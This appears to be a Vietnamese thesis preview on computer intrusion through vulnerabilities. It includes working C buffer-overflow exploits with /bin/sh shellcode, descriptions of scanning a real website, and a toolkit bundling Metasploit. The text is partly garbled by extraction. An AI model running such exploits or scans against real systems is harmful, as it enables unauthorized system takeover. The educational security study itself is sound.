Nghiên cứu cơ chế thâm nhập hệ thống máy tính thông qua lỗ hổng bảo mật và ứng dụng trong công tác đảm bảo an ninh mạng

86 33 0
Nghiên cứu cơ chế thâm nhập hệ thống máy tính thông qua lỗ hổng bảo mật và ứng dụng trong công tác đảm bảo an ninh mạng

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

-I- LỜI CẢM ƠN Trước tiên xin chân thành cảm ơn TS Nguyễn Ngọc Cương, Học Viện An Ninh Nhân Dân, người định hướng tận tình hướng dẫn, giúp đỡ tơi suốt q trình thực luận văn Tôi xin chân thành cảm ơn thầy cô giáo khoa Công nghệ Thông tin, trường Đại học Công nghệ Thông Tin & TT, người tận tình truyền đạt kiến thức, quan tâm, động viên suốt thời gian học tập nghiên cứu Trường Tôi xin chân thành cảm ơn Trường Đại học Điều Dưỡng Nam Định – Đơn vị mà công tác tạo điều kiện thời gian vật chất, tinh thần để tơi hồn thành nhiệm vụ học tập Nhân cho phép tơi gửi lời cảm ơn tới nhóm bạn học lớp CK09D, lớp chuyên ngành Khoa học Máy Tính, bạn đồng nghiệp thường xuyên quan tâm, giúp đỡ, chia sẻ kinh nghiệm, cung cấp tài liệu hữu ích thời gian học tập, nghiên cứu Trường trong trình thực luận văn tốt nghiệp vừa qua Cuối xin bảy tỏ biết ơn sâu sắc đến cha mẹ, người thân gia đình ln bên tơi, động viên, chia sẻ dành cho tơi tốt đẹp suốt thời gian học cao học thời gian thực luận văn tốt nghiệp Thái Nguyên, tháng 11 năm 2012 Trương Hồng Tiệp - II - LỜI CAM ĐOAN Tôi xin cam đoan luận văn “Nghiên cứu chế thâm nhập hệ thống máy tính thơng qua lỗ hổng bảo mật ứng dụng công tác đảm bảo an ninh mạng” cơng trình nghiên cứu tơi hướng dẫn khoa học TS Nguyễn Ngọc Cương, tham khảo nguồn tài liệu rõ trích dẫn danh mục tài liệu tham khảo Các nội dung cơng bố kết trình bày luận văn trung thực chưa công bố cơng trình Thái Ngun, tháng 11 năm 2012 Trương Hồng Tiệp - III - MỤC LỤC LỜI CẢM ƠN .I LỜI CAM ĐOAN II MỤC LỤC III DANH MỤC CÁC HÌNH VẼ VÀ BẢNG BIỂU VI MỞ ĐẦU Chương 1: TỔNG QUAN VỀ BẢO MẬT HỆ THỐNG MÁY TÍNH 1.1 An tồn bảo mật thơng tin 1.1.1 Khái niệm an toàn bảo mật thông tin 1.1.2 Hệ thống tài sản hệ thống máy tính 1.1.3 Đặc trưng kỹ thuật an toàn bảo mật 1.1.4 Các mức an toàn bảo mật 1.2 Lỗ hổng bảo mật 1.2.1 Khái niệm lỗ hổng bảo mật 1.2.2 Các loại lỗ hổng bảo mật 1.2.3 Một số lỗ hổng bảo mật phổ biến 1.3 Nguy bị công hệ thống máy tính 15 1.3.1.Tấn cơng hệ thống máy tính qua mạng 15 1.3.2.Một số kỹ thuật công 16 Chương 2: PHƯƠNG PHÁP THÂM NHẬP HỆ THỐNG MÁY TÍNH DỰA TRÊN KHAI THÁC LỖ HỔNG BẢO MẬT 20 2.1.Tấn công Injection 20 2.1.1 Khái niệm 20 2.1.2 Các dạng công SQL Injection 20 - IV - 2.1.3 Phịng chống cơng Injection 22 2.2 Tấn công từ chối dịch vụ 23 2.2.1 Tấn công thông qua kết nối (SYN Flood) 24 2.2.2 Lợi dụng tài nguyên nạn nhân để công 25 2.2.3 Tấn công từ chối dịch vụ phân tán (Distribute Denial of Service) 25 2.2.4 Tấn công từ chối dịch vụ phản xạ nhiều vùng (Distribute Reflection Denial of Service) 28 2.2.5 Tấn công từ chối dịch vụ sử dụng nguồn tài ngun khác 29 2.2.6 Phịng chống cơng từ chối dịch vụ 30 2.3 Tấn công tràn đệm (Buffer Overflow) 31 2.3.2 Cơ chế khai thác lỗi tràn đệm 37 2.3.3 Phòng chống công tràn đệm 37 2.4 Tổng kết phương thức khai thác lỗ hổng bảo mật để cơng hệ thống máy tính 39 Chương 3: MỘT SỐ GIẢI PHÁP ĐẢM BẢO AN NINH CHO HỆ THỐNG MÁY TÍNH 41 3.1 Thiết kế giải pháp an toàn an ninh cho hệ thống 41 3.1.1 Các chiến lược an toàn hệ thống 41 3.1.2 Các mức bảo vệ mạng 41 3.1.3 Các bước để xây dựng giải pháp tổng thể 43 3.2 Giải pháp Firewall 44 3.2.1 Khái niệm 44 3.2.2 Phân loại Firewall 44 3.2.3 Kiến trúc hệ thống mạng sử dụng Firewall 46 3.3 Giải pháp mạng riêng ảo (VPN) 47 -V- 3.3.1 Khái niệm 47 3.3.2 Các mơ hình triển khai VPN 48 3.4 Hệ thống phát xâm nhập (IDS) 49 3.4.1 Khái niệm 49 3.4.2 Chức IDS 50 3.4.3 Kiến trúc hệ thống IDS 50 3.4.4 Cách thức IDS làm việc 51 3.4.5.Một số phương pháp phát xâm nhập IDS 55 Chương 4: CÀI ĐẶT THỬ NGHIỆM CHƯƠNG TRÌNH KHAI THÁC LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG MÁY TÍNH 56 4.1 Xây dựng chương trình khai thác lỗi tràn đệm 56 4.1.1 Shellcode 56 4.1.2 Viết chương trình khai thác lỗi tràn đệm 61 4.2 Cài đặt thử nghiệm công cụ bảo mật sử dụng công tác đảm bảo an ninh hệ thống mạng 71 4.2.1 Tìm hiểu số phần mềm bảo mật 71 4.2.2 Xây dựng công cụ 74 KẾT LUẬN 77 TÀI LIỆU THAM KHẢO 78 - VI - DANH MỤC CÁC HÌNH VẼ VÀ BẢNG BIỂU Hình 1-1 Kiến trúc Ứng dụng Web Bảng 1-2 Các công nghệ thông tin quan trọng mà hacker muốn nhận diện 15 Hình 2-1 Minh họa công DoS 24 Hình 2-2 Tấn cơng từ chối dịch vụ thông qua kết nối 24 Hình 2-3 Mơ hình cơng DdoS 25 Hình 2-4 Sơ đồ phân loại kiểu cơng DDoS 26 Hình 2-5 : Kiến trúc attack – network kiểu Agent – Handler 27 Hình 2-6 Kiến trúc attack – network kiểu IRC – Based 28 Hình 2-7 Mơ hình cơng theo kiểu DRDoS 28 Hình 2-8 Mơ hình cơng Smurf attack 29 Hình 2-9 Mơ hình cơng Teardrop Attack 30 Hình 2-10 Đoạn code chứa lỗi tràn đệm 31 Hình 2-11 Giá trị khởi tạo liệu nhớ đệm 32 Hình 2-12 Ghi xâu ký tự vào đệm 32 Hình 2-13 Tổ chức nhớ tiến trình 32 Hình 2.14: Hoạt động liệu Stack 33 Hình 2-15 Bước khởi tạo hàm 36 Hình 2-16 Hai ghi trỏ đến địa 36 Hình 2-17 Lệnh thứ ba thực 37 Hình 3-1 Quy trình để xây dựng giải pháp cụ thể 43 Hình 3-2 Packet filtering firewall 45 Hình 3-3 Circuitlevel gateway 45 Hình 3-4 Application level gateway 46 - VII - Hình 3-5 Stateful multilayer inspection Firewall 46 Hình 3-6 Kiến trúc hệ thống mạng sử dụng Firewall 46 Hình 3-7 Các thành phần hệ thống Firewall 47 Hình 3-8 Giải pháp IPSec VPN 48 Hình 3-8 Giải pháp SSL VPN 49 Hình 3-9 Hệ thống mạng sử dụng IDS 49 Hình 3-10 Kiến trúc hệ thống IDS 50 Hình 3-11 Network-Based IDS (NIDS) 51 Hình 3-12 Host Based IDS (HIDS) 53 Hình 3-13 Hệ thống phát xâm nhập phân tán (DIDS) 54 Hình 4-1 Tổ chức shellcode nhớ 59 Hình 4-2 Trạng thái stack trước sau tràn đệm 59 Hình 4-3 Các khả xếp biến stack 60 Hình 4-4 Kết xác định địa Shellcode 61 Hình 4-5 Kết truyền Shellcode vào điệm 65 Hình 4-6 Kết truyền Shellcode vào biến môi trường 67 Hình 4-7 Kết chạy chương trình khai thác lỗi 69 Hình 4-8 Kết chạy chương trình kiểm tra hoạt động Stack 70 Hình 4-9 Giao diện phần mềm Spade 71 Hình 4-10 Thơng tin thu từ Website 72 Hình 4.11 Giao diện chương trình Web Vulnerability Scanner 73 Hình 4-12 Giao diện phần mềm Nmap 74 Hình 4-13 Giao diện cơng cụ bảo mật 75 Hình 4-14 Hiển thị chức cơng cụ 76 -1- MỞ ĐẦU Trong năm gần đây, việc xâm nhập, công mạng hacker tội phạm mạng nhằm vào hệ thống máy tính Việt Nam giới có xu hướng ngày gia tăng, gây nhiều hậu nghiêm trọng kinh tế trị Các công vào hệ thống máy tính tiến hành nhiều kỹ thuật khác Trong đó, đặc biệt có công thông qua khai thác lỗ hổng bảo mật hệ thống ứng dụng Do số ứng dụng thường sử dụng mã nguồn mở nên có nhiều lỗi gây lỗ hổng, dẫn đến hệ thống sử dụng phần mềm bị cơng Chính vậy, việc tìm kiếm, phát lỗ hổng hệ thống máy tính để hiểu chế kỹ thuật xâm nhập chúng cần thiết phòng chống công hacker vào hệ thống Đây lý để lựa chọn đề tài: “Nghiên cứu chế thâm nhập hệ thống máy tính thơng qua lỗ hổng bảo mật ứng dụng công tác đảm bảo an ninh mạng” Mục tiêu đề tài Tìm hiểu lỗ hổng bảo mật hệ thống ứng dụng, chất trình thâm nhập cơng hacker vào hệ thống máy tính thơng qua khai thác lỗ hổng bảo mật đưa phương pháp phịng tránh đảm bảo an ninh máy tính mạng máy tính Nội dung nghiên cứu Nghiên cứu, tìm hiểu số lỗ hổng bảo mật phổ biến hệ thống máy tính như: lỗ hổng bảo mật ứng dụng Web, Internet Explorer, Window Microsoft, Nghiên cứu phương pháp thâm nhập hệ thống máy tính sở khai thác lỗ hổng bảo mật như: Buffer Overflow (tràn đệm), công từ chối dịch vụ, cơng Injection, Viết chương trình thử nghiệm công kết hợp phương pháp gây tràn đệm cài đặt vào máy cần công thông qua lỗ hổng bảo mật Nghiên cứu phương pháp, công cụ để dị tìm, phát lỗ hổng bảo mật thông qua công cụ bảo mật như: Retina, Backtrack, Đề xuất số phương pháp kiểm tra phát xâm nhập -2- Phương pháp nghiên cứu Phương pháp tổng hợp: thu thập tài liệu, đối chiếu, so sánh, phân tích, liệt kê, đối sánh, trực quan, thực nghiệm, Phương pháp chuyên gia: tìm hiểu hệ thống máy tính, xây dựng hệ thống hoàn chỉnh, phần mềm phát lỗ hổng bảo mật, thâm nhập hệ thống Nghiên cứu ngôn ngữ lập trình để viết chương trình gây tràn đệm Phương pháp thực nghiệm: sử dụng mạng máy tính để thực hành xâm nhập thông qua lỗ hổng bảo mật Cấu trúc luận văn Chương 1: TỔNG QUAN VỀ BẢO MẬT HỆ THỐNG MÁY TÍNH 1.1 An tồn bảo mật thơng tin 1.1.1 Khái niệm an tồn bảo mật thơng tin Ngày nay, với phát triển bùng nổ công nghệ thông tin, hầu hết thông tin tổ chức, doanh nghiệp chiến lược kinh doanh, thông tin khách hàng, điều lưu trữ hệ thống máy tính Cùng với phát triển quan, tổ chức, doanh nghiệp địi hỏi ngày cao mơi trường làm việc nhanh chóng, hiệu nên thơng tin cần chia sẻ cho nhiều đối tượng khác thông qua môi trường Intranet hay Internet Việc mát, rị rỉ thơng tin ảnh hưởng nghiêm trọng đến tài chính, danh tiếng, quan, tổ chức Các phương thức công thông qua mạng ngày tinh vi, phức tạp dẫn đến mát thơng tin, chí làm sụp đổ hồn tồn hệ thống thơng tin tổ chức Vì an tồn bảo mật thơng tin nhiệm vụ nặng nề khó đốn trước An tồn bảo mật (an ninh) thông tin cách bảo vệ, đảm bảo cho tất thành phần hệ thống máy tính bao gồm liệu, thiết bị, sở hạ tầng mạng, đảm bảo tài nguyên sử dụng tương ứng với sách hoạt động ấn định với người có thẩm quyền tương ứng An tồn bảo mật thơng tin gồm hướng sau: - Đảm bảo an tồn thơng tin máy chủ - Bảo đảm an tồn thơng tin phía máy trạm - Bảo đảm an tồn thơng tin đường truyền An tồn bảo mật thơng tin bao gồm: - Xác định sách khả năng, nguy xâm phạm hệ thống máy tính, cố rủi ro thiết bị, liệu hệ thống để có giải pháp phù hợp đảm bảo an tồn cho hệ thống -3- - Đánh giá nguy công hacker tác động đến hệ thống, phát tán virus An tồn bảo mật hệ thống thơng tin vấn dề quan trọng hoạt đọng, giao dịch điện tử việc khai thác, sử dụng tài nguyên hệ thống - Xác định xác cấp độ an tồn, đánh giá nguy cơ, lỗ hổng khiến hệ thống bị xâm phạm thơng qua cách tiếp cận có cấu trúc Xác định nguy ăn cắp, phá hoại máy tính, thiết bị, nguy virus, bọ gián điệp, nguy xóa, phá hoại CSDL, ăn cắp mật khẩu, nguy hoạt động hệ thống nghẽn mạng, nhiễu điện tử Khi đánh giá hết nguy ảnh hưởng tới an ninh mạng có biện pháp tốt để đảm bảo an toàn cho hệ thống - Sử dụng hiệu công cụ bảo mật (như Firewall ) biện pháp, sách cụ thể chặt chẽ 1.1.2 Hệ thống tài sản hệ thống máy tính Hệ thống tập hợp máy tính gồm thành phần phần cứng, phần mềm liệu làm việc tích lũy qua thời gian Tài sản hệ thống bao gồm: - Phần cứng - Phần mềm - Dữ liệu - Các truyền thơng máy tính hệ thống - Môi trường làm việc - Con người 1.1.3 Đặc trưng kỹ thuật an toàn bảo mật - Xác thực (Authentification): Kiểm tra tính xác thực thực thể giao tiếp mạng Một thực thể người sử dụng, chương trình máy tính, thiết bị phần cứng Các hoạt động kiểm tra tính xác thực đánh giá quan trọng hoạt động phương thức bảo mật Một hệ thống thông thường phải thực kiểm tra tính xác thực phương thức bảo mật dựa vào mơ hình sau: + Đối tượng cần kiểm tra phải cung cấp thông tin trước, ví dụ password, mã số thơng tin cá nhân PIN (Personal Infomation Number) + Kiểm tra dựa vào mơ hình thơng tin có, đối tượng kiểm tra cần phải thể thông tin mà chúng sở hữu, ví dụ Private Key, số thẻ tín dụng + Kiểm tra dựa vào mơ hình thơng tin xác định tính nhất, đối tượng kiểm tra cần phải có thơng tin để định danh tính ví dụ thơng qua giọng nói, vân tay, chữ ký, - 65 - Kết chạy chương trình: Hình 4-5 Kết truyền Shellcode vào điệm Chương trình làm tràn đệm cho trỏ lệnh trỏ đến đoạn mã tạo giao tiếp dòng lệnh (ở /bin/sh) Sau chương trình thực làm tràn đệm, tìm đến địa đoạn mã để thực thi tiếp Nếu chương trình bị tràn chạy quyền có giao tiếp dòng lệnh với quyền tương đương điều khiển tồn hệ thống máy đối tượng - Truyền Shellcode vào biến môi trường: Thông thường ta sử dụng biến môi trường (environment) tham số dòng lệnh (argument) để chứa shellcode Do biến cấp stack, nhiên sử dụng biến môi trường thường đơn giản hiệu Với shellcode chứa biến môi trường, đệm dùng để làm tràn chứa toàn giá trị địa biến chứa shellcode Chương trình exploit1.c sửa lại sau (có thêm tham số kích thước đệm chứa shellcode) /*exploit2.c*/ #include #define DEFAULT_OFFSET #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 // mã Assembly lệnh NOP - 66 - char shellcode[] = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50” “\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xb\x31\xc0\x40\xcd\x80”; unsigned long get_sp( void) { asm(“movl %esp, %eax”); } void main (int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset = DEFAULT_OFFSET; int bsize = DEFAULT_BUFFER_SIZE; int i; int eggsize = DEFAULT_EGG_SIZE; if (argc < 2) { printf(“Usage: %s target [bsize offset eggsize]\n”, argv[0]); exit(0); } if (argc > 2) bsize = atoi(argv[2]); if (argc > 3) offset = atoi(argv[3]); if (argc > 4) eggsize = atoi(argv[4]); if (!(buff = malloc(bsize))) { printf(“khong the xac dinh duoc bo nho.\n”); exit(0); } if (!(egg = malloc(eggsize))) { printf(“khong the xac dinh duoc bo nho.\n”); exit(0); } addr = get_sp() – offset; printf(“su dung dia chi: 0x%x\n”, addr); - 67 - /*bộ đệm làm tràn chứa toàn địa shellcode*/ ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; /*NOP shellcode đặt biến môi trường*/ ptr = egg; for (i = 0; i < eggsize – strlen(shellcode); i++) buff[i] = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize – 1] = ‘\0’; egg[eggsize – 1] = ‘\0’; setenv(“EGG”, egg, 1); execl(argv[1], argv[1], buff, NULL); } Kết chạy chương trình: Hình 4-6 Kết truyền Shellcode vào biến môi trường - 68 - Kết chạy chương trình cơng tương tự chạy chương trình exploit1.c mà chương trình exploit2.c cơng vào chương trình bị tràn đệm với kích thước nhỏ overflow.c Cơng thức tính địa shellcode: addr = 0xBFFFFFFA – strlen(prog_name) – strlen(shellcode); Chương trình khai thác lỗi viết lại sau: /*Chương trình exploit3.c*/ #include #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 // mã Assembly lệnh NOP char shellcode[] = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50” “\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xb\x31\xc0\x40\xcd\x80”; void main (int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int bsize = DEFAULT_BUFFER_SIZE; int i; char *env[2] = {shellcode, NULL}; if (argc < 2) { printf(“Usage: %s target [bsize offset]\n”, argv[0]); exit(0); } if (argc > 2) bsize = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf(“khong the xac dinh duoc bo nho.\n”); exit(0); } addr = 0xbffffffa – strlen(shellcode) – strlen(argv[1]); printf(“su dung dia chi: 0x%x\n”, addr); /*bộ đệm làm tràn chứa toàn địa shellcode*/ ptr = buff; - 69 - addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; buff[bsize – 1] = ‘\0’; execle(argv[1], argv[1], buff, NULL, env); } Kết chạy chương trình: Hình 4-7 Kết chạy chương trình khai thác lỗi Ở có giao tiếp dịng lệnh điều khiển hệ thống máy đối tượng - Chương trình kiểm tra hoạt động Stack: Để kiểm tra xem hệ thống có cho thực chương trình stack khơng (vì đệm nằm stack), sử dụng chương trình sau: #include #include char bytecode[] = “\x31\xc0\x31\xbd\x31\xc9\x31\xd2\xeb\x11\x59\xb3\x01\xb2\x08\xb0” “\x04\xcd\x80\x31\xdb\x31\xc0\xb0\x01\xcd\x80\xe8\xea\xff\xff\xff” “\x47\x6f\x74\x63\x68\x61\x21\x0a”; - 70 - int main() { char buf[500] = “nhap vao ky tu bat ky:”; unsigned long *ptr = (unsigned long *) buf; // di chuyển trỏ unsigned long buf_addr = (unsigned long) ptr; // địa đệm /*tràn đệm địa trả về*/ int i; for (i = 0;i < 200; i++) *ptr++ = buf_addr; strcpy(buf, bytecode); return 0; } Kết chạy chương trình: Hình 4-8 Kết chạy chương trình kiểm tra hoạt động Stack - 71 - 4.2 Cài đặt thử nghiệm công cụ bảo mật sử dụng công tác đảm bảo an ninh hệ thống mạng 4.2.1 Tìm hiểu số phần mềm bảo mật - Phần mềm tra cứu thông tin Domain, Email, IP (Sam Spade): Sam spade phần mềm bảo mật mạnh có tích hợp nhiều công cụ giúp ta thu thập thông tin cần thiết Website, email, địa ip Các công cụ Whois, nslookup, traceroute, tích hợp Sam spade dạng giao diện đồ họa nên dễ sử dụng hoạt động hiệu Kết từ cơng cụ sử dụng tiếp cho công cụ khác Tính SMTP Verify tool phần mềm giúp ta kiểm tra địa email spam gửi trực tiếp từ địa hay địa chuyển tiếp (forward) từ địa khác Ngoài ra, Sam Spade cịn có khả giữ đường truyền PC bạn ISP cách thường xuyên gửi gói liệu HTTP tới máy chủ Web ISP Hơn nữa, tiện ích cịn tích hợp trình duyệt riêng, chương trình thực việc kiểm tra so sánh địa spammer lộng hành máy tính với sở liệu www.abuse.net , nhằm tìm xác thủ phạm có Để kiểm tra thơng tin trang Web mục tiêu, đánh địa nsc500.com vào trường nhập địa chỉ, sau tiến hành tra cứu thông tin liên quan đến trang Web này, như: địa ip, phiên máy chủ Web, Hình 4-9 Giao diện phần mềm Spade Trong Hình 4-9, tiến hành tracerouter tên miền nsc500.com Kết trình cho ta biết địa IP trang Web 203.128.246.134, từ máy kiểm tra đến máy mục tiêu có sử dụng router khác - 72 - Cũng trình này, sử dụng chức Web chương trình này, ta thu HTTP Header máy chủ đặt trang sau: Hình 4-10 Thơng tin thu từ Website Hình cho ta biết thông số máy chủ Web sau: sử dụng phương thức GET để lấy thông tin, giao thức sử dụng HTTP version 1.1, máy chủ Web sử dụng Microsoft-IIS/6.0, cho ta biết định dạng cookie mà máy chủ Web sử dụng, - Phần mềm quét lỗ hổng Cunetix Web Vulnerability Scanner: Là chương trình tự động kiểm tra ứng dụng Web để tìm kiếm lỗ hổng bảo mật SQL Injection, hay Cross-Site Scripting,… tìm kiếm sách mật đăng nhập phương thức xác thực vào Web Site Như thường thấy, lỗi bảo mật Việt Nam tập trung vào lỗ hổng nguy hiểm mà cơng cụ Scan cao cấp qt thấy Nhưng hầu hết admin dường quên mất, đến lỗ hổng dễ phát Sau cài đặt, để chạy chương trình ta chạy file wvs.exe Để tiến hành quét lỗ hổng trang Web có địa http://nsc500.com, ta cần nhập địa vào Start URL bắt đầu tiến hành quét, thu kết sau: - 73 - Hình 4.11 Giao diện chương trình Web Vulnerability Scanner Acunetix WVS công cụ quét lỗi cho ứng dụng Web dựa sở liệu rộng lớn cập nhật thường xuyên, với thuật toán heuristic đáp ứng chế họat động phức tạp môi trường Web Acunetix WVS tự động kiểm tra lổ hỗng thơng dụng cross site scripting, sql injection mối nhạy cảm khác Web site truy cập trình duyệt, hay ứng dụng xây dụng kỹ thuật tiên tiến AJAX để thực điều Acunetix WVS dựa nhiều phương pháp cơng cụ tích hợp để: Lấy (crawling) toàn Website gồm tất liên kết site tập tin robots.txt sau hiển thị toàn cấu trúc cách chi tiết • Sau tiến trình cwarling khám phá tình trạng ứng dụng Web, Acunetix WVS tự động phát động đợt cơng lập trình sẵn dựa lổ hổng, giống Web site bị hacker cơng thực sự, phân tích trang vị trí nhập liệu với kết hợp khác liệu đầu vào làm cho Website hiển thị thơng tin nhạy cảm Sau tìm lổ hổng, Acunetix WVS thông báo “Alerts Node”, alert gồm thông tin lỗi mối nguy hiểm gặp phải “dĩ nhiên” kèm theo khuyến nghị cách thức khắc phục Sau tiến trình kiểm tra hồn tất, lưu lại thành tập tin để phân tích sau này, với cơng cụ báo cáo chuyên nghiệp giúp cho nhà quản trị Web dễ dàng tổng hợp kết kiểm tra khác ứng dụng Web Mức độ bảo mật Website AWV đánh giá từ mức thấp, trung bình, cao Nếu Website bạn liệt kê mức thấp phải vá lỗi nhanh AWV liệt kê - 74 - - Phần mềm quét cổng Nmap: Nmap công cụ để scanning Scanning hay cịn gọi qt mạng bước khơng thể thiếu q trình cơng vào hệ thống mạng hacker Nếu scanning tốt, hacker nhanh chóng phát lỗi hệ thống, từ sử dụng đoạn mã độc hại, công cụ khai thác để cơng hệ thống Nmap giúp người quản trị tìm lỗi hệ thống, đồng thời đưa giải pháp để sửa lỗi cập nhật dịch vụ, vá, hay sách hợp lý Phần mềm Nmap có phiên dành cho Window dành cho Linux Ở đây, luân văn giới thiệu phiên dành cho Window Hình 4-12 Giao diện phần mềm Nmap Cấu trúc lệnh Nmap: nmap [ kiểu quét ] [tùy chọn ] 4.2.2 Xây dựng công cụ Hiện nay, phần mềm hãng tin học đưa hacker sử dụng có hiệu khai thác lỗ hổng bảo mật Đó phần mềm: Samspade, Nmap, Web Vulnerability Scaner, Retina, Để chủ động sử dụng để kiểm tra khai thác nghiên cứu, thử nghiệm, đánh giá phần mềm để có sở vận dụng vào công tác điều tra Trên sở đó, chúng tơi tích hợp phần mềm để tạo nên công cụ đa ứng dụng vào thực tiễn Bộ cơng cụ có chức qt, phát lỗ hổng bảo mật máy chủ, Website, khai thác lỗ hổng, công cụ giám sát, thu thập thơng tin mục tiêu Các phần mềm tích hợp công cụ này: Các phần mềm sử dụng để giám sát, thu thập thông tin mục tiêu Internet: Auto Hide IP 5.1.1.2 : Dùng để Fake địa IP - 75 - IP Info : Dùng để xem thông tin địa IP: Nhà cung cấp, chủ thuê bao, Mail, Phone number Sam Spade 1.14: Thu thập thông tin Domain, IP Zenmap: Quét cổng Các phần mềm để kiểm tra lỗ hổng bảo mật Server: Acunetix Web Vulnerability Scaner, Retina Các phần mềm khai thác lỗ hổng bảo mật Website: Metasploit Các phần mềm để tạo phần mềm tích hợp Tools bảo mật:UtraISO, AutoPlay Media Studio Trial Hình 4-13 Giao diện cơng cụ bảo mật - 76 - Hình 4-14 Hiển thị chức công cụ - 77 - KẾT LUẬN Sau thời gian nghiên cứu tìm hiểu, vận dụng kiến thức học vào yêu cầu thực tế đề tài luận văn, luận văn thực công việc sau: - Tìm hiểu cơng tin học kỹ thuật thâm nhập máy tính Tìm hiểu giải pháp đảm bảo cho an ninh máy tính, phát xâm nhập tin tặc hacker, tìm chiến lược an toàn cho hệ thống, mức bảo vệ mạng máy tính như: mạng riêng ảo(VPN), Dos, DDos, DRDos, Smurf attack, Teardrop Attack, Host Based IDS (HIDS), IDS, DIDS, Firewall… - Tìm hiểu lỗi tràn đệm, tổ chức nhớ tiến trình (process), thao tác nhớ stack gọi hàm kỹ thuật để tạo shellcode – đoạn mã thực thi giao tiếp dịng lệnh (shell) - Tìm hiểu kỹ thuật tràn đệm bản, tổ chức shellcode, xác định địa trả về, địa shellcode, cách truyền shellcode cho chương trình bị lỗi.Sử dụng chương trình công tràn đệm máy chỗ tìm hiểu phương pháp phịng tránh lỗi tràn đệm, thử nghiệm công cụ bảo mật sử dụng công tác đảm bảo an ninh hệ thống mạng Các chương trình dùng đển cơng máy tính chỗ (local) đối tượng, chương trình công vào mạng riêng ảo(VPN), Dos, DDos, DRDos, Smurf attack, Teardrop Attack, Host Based IDS (HIDS), IDS, DIDS, Firewall, lỗi tràn đệm để chạy đoạn shellcode mà ta chèn vào Shellcode làm nhiều thứ, từ việc điều chỉnh hệ thống hay download thực thi tập tin từ Internet việc gửi email ngồi Chương trình dừng lại việc công vào chương trình bị tràn đệm để chạy đoạn shellcode thực giao tiếp dịng lệnh thành cơng Xây dựng thử nghiệm công cụ bảo mật sử dụng công tác đảm bảo an ninh hệ thống mạng Trong tương lai chúng tơi tìm hiểu viết shellcode cơng gửi thư, chép liệu, , chương trình cơng máy tính từ xa đưa giải pháp phịng cơng máy tính cách tinh vi đại theo xu thời đại khoa học kỹ thuật phát triển Do thời gian nghiên cứu chưa nhiều, khả kinh nghiệm thân cịn nên luận văn cịn nhiều thiếu sót Tác giả mong nhận góp ý thầy giáo, anh chị, bạn bè, để tiếp tục hồn thiện luận văn mình, mang lại kiến thức cho thân - 78 - TÀI LIỆU THAM KHẢO Tiếng Việt [1] Đặng Minh Tuấn, Giáo trình mã nguồn mở ứng dụng Quân sự, Giáo trình Trung tâm KHKT- CNQS, năm 2007 [2] Phạm Việt Trung , Chiến tranh cơng nghệ thơng tin, Giáo trình Trung tâm KHKTCNQS, năm 2007 [3] Vũ Đình Cường, Phương Lan, Từng bước khám phá an ninh mạng - Tìm hiểu kiểu cơng phương pháp phịng chống, NXB Lao động -Xã hội 2008 [4] Vũ Đình Cường, Phương Lan, Từng bước khám phá an ninh mạng - Cách bảo vệ liệu quan trọng phương pháp phát thâm nhập , NXB Lao động-Xã hội 2008 [5] Vũ Đình Cường, Phương Lan, Hack internet OS bảo mật , NXB Lao động-Xã hội 2008 [6] Vũ Đình Cường, Phương Lan, Phương pháp thâm nhập Web Server & cách phòng chống, NXB Lao động-Xã hội 2008 [7] Vũ Đình Cường, Phương Lan, Cách bảo vệ liệu quan trọng & phương pháp phát thâm nhập, NXB Lao động-Xã hội 2008 [8].Vũ Đình Cường, Phương Lan, Các kiểu cơng & phương pháp phịng chống, NXB Lao động- Xã hội 2008 [9] Lê Tấn Liên, Minh Quân, Hacking Wireless kỹ thuật thâm nhập mạng không dây, NXB Hồng Đức 2009 [10] Nguyễn Ngọc Cương, Giáo trình tin học ứng dụng cơng an, NXB Công an nhân dân 2009 [11] Nguyễn Ngọc Cương, Tin học ứng dụng cơng tác phịng chốn tội phạm, NXB Công an nhân dân 2010 Tiếng Anh [12] Smashing The Stack For Fun and Profit by "Aleph One", 1996 [13] How to Write Buffer Overflows by "Mudge", 1997 [14] Buffer Overflows: Why, How and Prevention by "Decker", 2000 [15] Writing buffer overflow exploits - a tutorial for beginners – Mixter [16] Bots botnet overview – Ramneek Puri - 2003 [17] Jonathan Salwan, Shellcode-linux by 2009 - 79 - Website [18] Một số thông tin Website http://tailieu.vn [19].http://www.quantrimang.com.vn/baomat/hacker/36773_Botnet-hoat-dong-nhu-thenao.aspx [20] http://rootbiez.blogspot.com/2009/11/virus-botnet.html [21].http://solidsnack1107.wordpress.com/2011/01/27/15-vu-tan-cong-noi-tieng-tronglic-su/ [22] www.php.net [23] http://www.autoitscript.com/ [24] http://vi.wikipedia.org/wiki/TCP/IP [25] http://vi.wikipedia.org/wiki/M%C3%B4_h%C3%ACnh_OSI [26] http://vi.wikipedia.org/wiki/IRC ... lỗ hổng bảo mật ứng dụng công tác đảm bảo an ninh mạng? ?? Mục tiêu đề tài Tìm hiểu lỗ hổng bảo mật hệ thống ứng dụng, chất trình thâm nhập cơng hacker vào hệ thống máy tính thơng qua khai thác lỗ. .. lỗ hổng bảo mật đưa phương pháp phịng tránh đảm bảo an ninh máy tính mạng máy tính Nội dung nghiên cứu Nghiên cứu, tìm hiểu số lỗ hổng bảo mật phổ biến hệ thống máy tính như: lỗ hổng bảo mật ứng. ..- II - LỜI CAM ĐOAN Tôi xin cam đoan luận văn ? ?Nghiên cứu chế thâm nhập hệ thống máy tính thơng qua lỗ hổng bảo mật ứng dụng công tác đảm bảo an ninh mạng? ?? cơng trình nghiên cứu tơi hướng dẫn

